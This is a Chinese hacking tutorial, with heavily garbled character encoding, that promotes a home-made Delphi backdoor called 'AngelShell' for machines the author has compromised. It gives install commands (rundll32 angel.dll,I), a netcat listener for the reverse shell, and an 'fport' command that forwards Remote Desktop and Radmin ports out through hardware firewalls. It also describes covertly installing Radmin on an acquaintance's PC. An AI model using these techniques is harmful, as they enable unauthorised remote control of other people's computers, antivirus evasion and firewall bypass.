現(xiàn)在的服務(wù)器幾乎全是放在硬件防火墻后的，好不容易滲透進(jìn)去，結(jié)果卻發(fā)現(xiàn)裝有硬件防火墻，掃興啊！什么終端服務(wù)、什么Radmin之類的控方式想都不要想。試了試，發(fā)現(xiàn)幾乎都支持反向連接，正向連接只能連接80和21端口，連1433都連不上。那就傳個(gè)反向的后門上去吧，一傳上去就被殺毒軟件Kill了。一氣之下，搬出Delphi，自己動(dòng)手寫后門！花了幾天的時(shí)間，后門終于寫好了，也達(dá)到了理想中的要求，使用效果非常不錯(cuò)，足以稱為硬件防火墻和內(nèi)網(wǎng)肉雞的噩夢(mèng)了！不敢獨(dú)享，趕緊拿出來給大家共同分享一下。   
這個(gè)程序叫AngelShell，這里用我的肉雞和自己使用的計(jì)算機(jī)做測(cè)試。首先需要在本地配置一個(gè)記載反向連接信息的文件，第一行是自己的IP，第二行是用NC監(jiān)聽的端口。寫好后把它放到HTTP空間上，然后進(jìn)行配置：配置好密碼和你剛才上傳到FTP空間里的HTTP訪問地址。   
你可以選擇生成DLL的服務(wù)端或者EXE的服務(wù)端，其中EXE的服務(wù)端直接運(yùn)行即可安裝，而DLL的服務(wù)端則需要用如下命令安裝：“rundll32 dll路徑，I”，記得最后一個(gè)I一定要大寫。   

小提示：程序作者其實(shí)是為了方便大家才提供的EXE服務(wù)端，其本質(zhì)也是安裝DLL程序，只不過是用程序來解包并自動(dòng)實(shí)現(xiàn)安裝。   

這里我以DLL服務(wù)端來示范。先把DLL傳到心愛的肉雞上面，然后在命令行上面打入：“rundll32 angel.dll,I”。注意這里我是通過FTP連接上肉雞的，為了方便就直接用FTP的命令行安裝了。   
裝好以后，在自己的機(jī)器上用：“nc –v –l –p 7787”監(jiān)聽7787端口，也就是我最開始寫的配置文件里的端口。過了一會(huì)NC就提示有信息傳輸，輸入密碼敲回車，OK，連接成功。幫助信息顯示后，可愛的Shell出來了。   
小提示：這個(gè)后門還提供了一些附加命令，可以直接在Shell中執(zhí)行。作者為了避免與已有的程序名沖突，所以附加命令全部為小寫。   

　　講到這里，大家也許會(huì)覺得偶這款后門除了可以生成EXE服務(wù)端以外，也沒什么特別的。當(dāng)然，就這些功能當(dāng)然不夠打造出我的特色，也不能算是硬件防火墻的噩夢(mèng)。我們這次用的后門，不僅是要讓它自己能夠?qū)崿F(xiàn)反向連接，而且要讓其它所有的能正向連接的程序都實(shí)現(xiàn)反向連接，比如終端服務(wù)、Radmin、MSSQL等等！呵呵，不要吃驚，好戲正在后頭呢，偶不會(huì)讓大家失望的，Let's GO！   
看到Shell里的Fport附加命令沒有？也就是端口轉(zhuǎn)發(fā)，它可以把遠(yuǎn)程計(jì)算機(jī)的任意端口反向模擬到本地來。什么？你沒懂？呵呵，沒關(guān)系，往下看就知道了。我們先來測(cè)試一下Windows的終端服務(wù)。這臺(tái)肉雞以前就被我開過終端服務(wù)了，但一直苦于硬件防火墻的攔截而無法連接，今天要好好爽一下！   

小知識(shí)：Fport的用法：   
fport    
其中參數(shù)local port是指你在肉雞上要轉(zhuǎn)發(fā)的端口，Your IP 是你的IP（或域名，YourPort是指你的客戶端上監(jiān)聽的端口。   

打開客戶端，在“要模擬的端口”上面填3389，在“連接遠(yuǎn)程計(jì)算機(jī)的端口”上任意填，當(dāng)然不要與已開的端口沖突，這里我填7788，然后點(diǎn)“開始監(jiān)聽”。趕緊到肉雞的Shell下面敲入：“fport 3389 61.187.***.*** 7788”。其中3389是肉雞的終端服務(wù)的端口，7788是我們這邊這個(gè)連接遠(yuǎn)程計(jì)算機(jī)的端口。然后客戶端上馬上提示已接收到遠(yuǎn)程計(jì)算機(jī)的連接，提示此時(shí)已經(jīng)可以連接本地的3389端口了。這樣我們就把肉雞上的3389端口搬到自己的愛機(jī)上來了。   
朋友們，我們還等什么呢？打開終端服務(wù)登錄器，IP填上本地的127.0.0.1，連接，客戶端馬上顯示已經(jīng)成功建立了一個(gè)新的連接，并出現(xiàn)了遠(yuǎn)程桌面登錄的對(duì)話框，我心里那個(gè)激動(dòng)啊，真是語言無法表達(dá)！   
我們?cè)僭囋嚨卿泝蓚€(gè)用戶，客戶端又顯示成功建立了一個(gè)新的連接。事實(shí)證明，同時(shí)登錄2個(gè)用戶也成功了！當(dāng)然，如果你愿意的話可以登錄更多的用戶，我編程的時(shí)候設(shè)置的每個(gè)連接都通過2個(gè)線程來進(jìn)行數(shù)據(jù)傳輸，所以在傳輸速度方面是有保障的。   
　　正沉浸在喜悅中時(shí)，電話響了，原來是一位MM買了攝像頭，叫我去幫她裝，這也要去？于是叫她上QQ，正好給偶再測(cè)試一次。這位MM雖然沒有硬件級(jí)的防火墻，但是她在內(nèi)網(wǎng)，用的是Windows XP專業(yè)版。我先把EXE的服務(wù)端傳給她，叫她運(yùn)行，然后在本地進(jìn)行監(jiān)聽，過一會(huì)就提示收到信息并需要輸入密碼。輸入密碼后得到了一個(gè)Shell，再用文件下載功能給她安裝一個(gè)Radmin，夠陰險(xiǎn)吧！然后敲入如下命令：“fport 4899 61.187.***.*** 7788”，將她的4899端口轉(zhuǎn)發(fā)到我的4899端口來，然后在本地打開Radmin Viewer，連接IP寫127.0.0.1，端口就用默認(rèn)的4899，成功連接！。   

幫她打開設(shè)備管理器，三下五除二裝好了攝相頭驅(qū)動(dòng)程序，MM還楞在那不知道怎么回事，哈哈，等她反應(yīng)過來后那個(gè)崇拜??！非吵著要拜我為師，汗……測(cè)試到這里也就結(jié)束了，心里的痛快就別提了，呵呵！   

該程序理論上是支持任何協(xié)議的，但是由于某些協(xié)議的特殊性，它會(huì)對(duì)IP進(jìn)行驗(yàn)證，所以可能會(huì)達(dá)不到我們想要的效果。比如WEB服務(wù)，今天本來把肉雞上的80端口轉(zhuǎn)過來了，想騙騙別人說自己開了個(gè)網(wǎng)站。結(jié)果一連上來卻顯示什么：“No web……in this ……”，大概意思就是這個(gè)地址沒有WEB服務(wù)，這才想起HTTP協(xié)議中還有個(gè)Host的值不符合，難怪。   
最后說一下關(guān)于在內(nèi)網(wǎng)中使用本程序的方法。如果自己在內(nèi)網(wǎng)的話，需要一臺(tái)允許正向連接的肉雞來做中轉(zhuǎn)，把要轉(zhuǎn)的那臺(tái)服務(wù)器的端口轉(zhuǎn)到這個(gè)中轉(zhuǎn)肉雞上，然后直接連接這個(gè)中轉(zhuǎn)肉雞就相當(dāng)于連接服務(wù)器了！    
好了，希望這篇文章能給大家?guī)韼椭?，朋友們能看到這里，我也已經(jīng)很感謝了。最后祝大家永遠(yuǎn)開心，技術(shù)蒸蒸日上！  

最新評(píng)論